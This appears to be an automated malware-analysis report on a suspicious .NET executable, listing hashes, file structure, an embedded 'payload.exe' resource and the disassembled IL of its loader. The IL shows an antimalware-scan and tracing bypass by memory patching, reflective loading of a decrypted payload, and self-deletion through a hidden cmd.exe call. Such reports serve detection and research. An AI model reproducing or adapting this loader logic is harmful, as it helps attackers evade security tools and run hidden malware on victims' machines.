Suspicious
Suspect

1facb72432963ada9ef94a4c07a80fa6

PE Executable | MD5: 1facb72432963ada9ef94a4c07a80fa6 | Size: 1.25 MB | application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Medium

Hash
Hash Value
MD5
1facb72432963ada9ef94a4c07a80fa6
Sha1
ed5eb3bf7b70914d49fd0860db4a66e199a62a18
Sha256
025323036275f6ca30f6c79c80d2c999fe0451fe943b668055dc7bd3f8770727
Sha384
e798df53e0af896f5992dc1e816283ea826e6ce2e201fc5e67fc4c16cf53c1334cf120375ae400a15f8731f5b717c7db
Sha512
aa4f5b1333253bf7708a7e4c42a954a896f7491a3f94c2e37e4c3f852f533cb4b64dd5d5624695090c268fbc48c56f4ec520eaabecccb56f49301ee08ca81bab
SSDeep
24576:+/rK9wuttYTIC1c2EDJNVRx1ucU4s25sW6ocShToAM0RP5H/Z1:oRuDYTIkz8J1Kj25sccsnN5x1
TLSH
74453322BD2AE518E8E8F27E8664E2F37400531E9E01C9D7BCDC1DF5261EE4516AF391

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
payload.exe
Information
Name
Value
Info

PE Detect: PeReader OK (file layout)

Module Name: tmpEF31.tmp
Full Name: tmpEF31.tmp
EntryPoint: System.Void mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::Main(System.String[])
Scope Name: tmpEF31.tmp
Scope Type: ModuleDef
Kind: Console
Runtime Version: v4.0.30319
Tables Header Version: 512
WinMD Version: <null>
Assembly Name: tmpEF31
Assembly Version: 0.0.0.0
Assembly Culture: <null>
Has PublicKey: False
PublicKey Token: <null>
Target Framework: <null>
Total Strings: 24
Main Method: System.Void mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::Main(System.String[])
Main IL Instruction Count: 329

Main IL

call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() callvirt System.String System.Diagnostics.ProcessModule::get_FileName() stloc.0 <null> ldloc.0 <null> ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) ldstr kernel32.dll call System.IntPtr mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::LoadLibrary(System.String) stloc.1 <null> ldloc.1 <null> ldstr VirtualProtect call System.IntPtr mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::GetProcAddress(System.IntPtr,System.String) stloc.2 <null> ldloc.2 <null> ldtoken mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/vZOLYKpZSSYDKxVWUnAO call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Delegate System.Runtime.InteropServices.Marshal::GetDelegateForFunctionPointer(System.IntPtr,System.Type) castclass mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/vZOLYKpZSSYDKxVWUnAO stloc.3 <null> ldstr amsi.dll call System.IntPtr mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::LoadLibrary(System.String) stloc.s V_6 ldloc.s V_6 call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr 7lT5Vz+AvOoWbMEniz+BJA== call System.Byte[] System.Convert::FromBase64String(System.String) ldstr KMF+T/UYRRTqZ+yCaE5iBHsrblAl1nAjsktFBEB3GJY= call System.Byte[] System.Convert::FromBase64String(System.String) ldstr At4Jd4+5dBTDTTqMUQ22+Q== call System.Byte[] System.Convert::FromBase64String(System.String) call System.Byte[] mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::xawblEyvpjgpwRHUWpzS(System.Byte[],System.Byte[],System.Byte[]) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.IntPtr mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::GetProcAddress(System.IntPtr,System.String) stloc.s V_7 call System.Int32 System.IntPtr::get_Size() ldc.i4.8 <null> bne.un.s IL_00A3: ldc.i4.8 ldc.i4.6 <null> newarr System.Byte dup <null> ldtoken 
<PrivateImplementationDetails>{CF775947-B64C-4FE2-B32D-F2214A54FF8B}/__StaticArrayInitTypeSize=6 <PrivateImplementationDetails>{CF775947-B64C-4FE2-B32D-F2214A54FF8B}::$$method0x6000003-1 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_4 br.s IL_00B6: ldloc.3 ldc.i4.8 <null> newarr System.Byte dup <null> ldtoken System.Int64 <PrivateImplementationDetails>{CF775947-B64C-4FE2-B32D-F2214A54FF8B}::$$method0x6000003-2 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_4 ldloc.3 <null> ldloc.s V_7 ldloc.s V_4 ldlen <null> conv.i4 <null> conv.i8 <null> call System.UIntPtr System.UIntPtr::op_Explicit(System.UInt64) ldc.i4.s 64 ldloca.s V_5 callvirt System.Boolean mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/vZOLYKpZSSYDKxVWUnAO::Invoke(System.IntPtr,System.UIntPtr,System.UInt32,System.UInt32&) pop <null> ldloc.s V_4 ldc.i4.0 <null> ldloc.s V_7 ldloc.s V_4 ldlen <null> conv.i4 <null> call System.Void System.Runtime.InteropServices.Marshal::Copy(System.Byte[],System.Int32,System.IntPtr,System.Int32) ldloc.3 <null> ldloc.s V_7 ldloc.s V_4 ldlen <null> conv.i4 <null> conv.i8 <null> call System.UIntPtr System.UIntPtr::op_Explicit(System.UInt64) ldloc.s V_5 ldloca.s V_5 callvirt System.Boolean mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/vZOLYKpZSSYDKxVWUnAO::Invoke(System.IntPtr,System.UIntPtr,System.UInt32,System.UInt32&) pop <null> ldstr ntdll.dll call System.IntPtr mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::LoadLibrary(System.String) stloc.s V_8 ldloc.s V_8 call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr K0+7fQP7UklwP+G8Bl17qA== call System.Byte[] System.Convert::FromBase64String(System.String) ldstr KMF+T/UYRRTqZ+yCaE5iBHsrblAl1nAjsktFBEB3GJY= call System.Byte[] System.Convert::FromBase64String(System.String) ldstr At4Jd4+5dBTDTTqMUQ22+Q== call System.Byte[] 
System.Convert::FromBase64String(System.String) call System.Byte[] mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::xawblEyvpjgpwRHUWpzS(System.Byte[],System.Byte[],System.Byte[]) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.IntPtr mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::GetProcAddress(System.IntPtr,System.String) stloc.s V_9 call System.Int32 System.IntPtr::get_Size() ldc.i4.8 <null> bne.un.s IL_0153: ldc.i4.3 ldc.i4.1 <null> newarr System.Byte stloc.s V_20 ldloc.s V_20 ldc.i4.0 <null> ldc.i4 195 stelem.i1 <null> ldloc.s V_20 stloc.s V_4 br.s IL_016E: ldloc.3 ldc.i4.3 <null> newarr System.Byte stloc.s V_21 ldloc.s V_21 ldc.i4.0 <null> ldc.i4 194 stelem.i1 <null> ldloc.s V_21 ldc.i4.1 <null> ldc.i4.s 20 stelem.i1 <null> ldloc.s V_21 stloc.s V_4 ldloc.3 <null> ldloc.s V_9 ldloc.s V_4 ldlen <null> conv.i4 <null> conv.i8 <null> call System.UIntPtr System.UIntPtr::op_Explicit(System.UInt64) ldc.i4.s 64 ldloca.s V_5 callvirt System.Boolean mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/vZOLYKpZSSYDKxVWUnAO::Invoke(System.IntPtr,System.UIntPtr,System.UInt32,System.UInt32&) pop <null> ldloc.s V_4 ldc.i4.0 <null> ldloc.s V_9 ldloc.s V_4 ldlen <null> conv.i4 <null> call System.Void System.Runtime.InteropServices.Marshal::Copy(System.Byte[],System.Int32,System.IntPtr,System.Int32) ldloc.3 <null> ldloc.s V_9 ldloc.s V_4 ldlen <null> conv.i4 <null> conv.i8 <null> call System.UIntPtr System.UIntPtr::op_Explicit(System.UInt64) ldloc.s V_5 ldloca.s V_5 callvirt System.Boolean mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/vZOLYKpZSSYDKxVWUnAO::Invoke(System.IntPtr,System.UIntPtr,System.UInt32,System.UInt32&) pop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr S/uz9ucp802EJbcpSzYecw== call System.Byte[] System.Convert::FromBase64String(System.String) ldstr KMF+T/UYRRTqZ+yCaE5iBHsrblAl1nAjsktFBEB3GJY= call System.Byte[] System.Convert::FromBase64String(System.String) ldstr At4Jd4+5dBTDTTqMUQ22+Q== call System.Byte[] 
System.Convert::FromBase64String(System.String) call System.Byte[] mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::xawblEyvpjgpwRHUWpzS(System.Byte[],System.Byte[],System.Byte[]) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stloc.s V_10 call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr HeskabV2WCi4Yc2LFk10sw== call System.Byte[] System.Convert::FromBase64String(System.String) ldstr KMF+T/UYRRTqZ+yCaE5iBHsrblAl1nAjsktFBEB3GJY= call System.Byte[] System.Convert::FromBase64String(System.String) ldstr At4Jd4+5dBTDTTqMUQ22+Q== call System.Byte[] System.Convert::FromBase64String(System.String) call System.Byte[] mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::xawblEyvpjgpwRHUWpzS(System.Byte[],System.Byte[],System.Byte[]) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stloc.s V_11 call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() stloc.s V_12 ldloc.s V_12 callvirt System.String[] System.Reflection.Assembly::GetManifestResourceNames() stloc.s V_22 ldc.i4.0 <null> stloc.s V_23 br IL_02A0: ldloc.s V_23 ldnull <null> stloc.s V_13 newobj System.Void mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/<>c__DisplayClass3::.ctor() stloc.s V_14 ldloc.s V_14 ldloc.s V_22 ldloc.s V_23 ldelem.ref <null> stfld System.String mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/<>c__DisplayClass3::name ldloc.s V_14 ldfld System.String mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/<>c__DisplayClass3::name ldloc.s V_10 call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_029A: ldloc.s V_23 ldloc.s V_14 ldfld System.String mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/<>c__DisplayClass3::name ldloc.s V_11 call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_029A: ldloc.s V_23 ldloc.s V_14 ldfld System.String mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/<>c__DisplayClass3::name ldloc.s V_14 ldfld System.String 
mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/<>c__DisplayClass3::name call System.Byte[] mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::WSesTlzVzAKKeQhxtdbi(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldloc.s V_14 ldfld System.String mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/<>c__DisplayClass3::name ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) ldloc.s V_13 brtrue.s IL_028E: ldloc.s V_13 ldloc.s V_14 ldftn System.Void mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV/<>c__DisplayClass3::<Main>b__1() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) stloc.s V_13 ldloc.s V_13 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) call System.Void System.Threading.Thread::Start() ldloc.s V_23 ldc.i4.1 <null> add <null> stloc.s V_23 ldloc.s V_23 ldloc.s V_22 ldlen <null> conv.i4 <null> blt IL_0220: ldnull ldloc.s V_10 call System.Byte[] mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::WSesTlzVzAKKeQhxtdbi(System.String) ldstr KMF+T/UYRRTqZ+yCaE5iBHsrblAl1nAjsktFBEB3GJY= call System.Byte[] System.Convert::FromBase64String(System.String) ldstr At4Jd4+5dBTDTTqMUQ22+Q== call System.Byte[] System.Convert::FromBase64String(System.String) call System.Byte[] mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::xawblEyvpjgpwRHUWpzS(System.Byte[],System.Byte[],System.Byte[]) call System.Byte[] mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::OZGtadjyGDkvZxZOVsEc(System.Byte[]) stloc.s V_15 ldc.i4.0 <null> newarr System.String stloc.s V_16 ldarg.0 <null> ldc.i4.0 <null> ldelem.ref <null> ldc.i4.1 <null> newarr System.Char stloc.s V_24 ldloc.s V_24 ldc.i4.0 <null> ldc.i4.s 32 stelem.i2 <null> ldloc.s V_24 callvirt System.String[] System.String::Split(System.Char[]) stloc.s V_16 leave.s IL_02F9: ldloc.s V_15 pop <null> leave.s IL_02F9: ldloc.s V_15 ldloc.s V_15 call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) callvirt 
System.Reflection.MethodInfo System.Reflection.Assembly::get_EntryPoint() stloc.s V_17 ldloc.s V_17 ldnull <null> ldc.i4.1 <null> newarr System.Object stloc.s V_25 ldloc.s V_25 ldc.i4.0 <null> ldloc.s V_16 stelem.ref <null> ldloc.s V_25 callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave.s IL_032F: call System.Text.Encoding System.Text.Encoding::get_UTF8() pop <null> ldloc.s V_17 ldnull <null> ldnull <null> callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave.s IL_032F: call System.Text.Encoding System.Text.Encoding::get_UTF8() call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr Nh6o4GJlfwaZDPJgE/l94U8mdkMQsGBPXIh+5fD4Qomy7l+ZeCMUJ5yUK/5k7wK8 call System.Byte[] System.Convert::FromBase64String(System.String) ldstr KMF+T/UYRRTqZ+yCaE5iBHsrblAl1nAjsktFBEB3GJY= call System.Byte[] System.Convert::FromBase64String(System.String) ldstr At4Jd4+5dBTDTTqMUQ22+Q== call System.Byte[] System.Convert::FromBase64String(System.String) call System.Byte[] mqfhnbsjtBZWFbkkZItw.OsuQHvntCZAWNguGaEIV::xawblEyvpjgpwRHUWpzS(System.Byte[],System.Byte[],System.Byte[]) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stloc.s V_18 newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() stloc.s V_19 ldloc.s V_19 ldc.i4.5 <null> newarr System.String stloc.s V_26 ldloc.s V_26 ldc.i4.0 <null> ldloc.s V_18 stelem.ref <null> ldloc.s V_26 ldc.i4.1 <null> ldloc.0 <null> stelem.ref <null> ldloc.s V_26 ldc.i4.2 <null> ldstr " & del " stelem.ref <null> ldloc.s V_26 ldc.i4.3 <null> ldloc.0 <null> stelem.ref <null> ldloc.s V_26 ldc.i4.4 <null> ldstr " stelem.ref <null> ldloc.s V_26 call System.String System.String::Concat(System.String[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.s V_19 ldc.i4.1 <null> callvirt System.Void 
System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) ldloc.s V_19 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) ldloc.s V_19 ldstr cmd.exe callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) ldloc.s V_19 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> ret <null>

Characteristics
No malware configuration was found at this point.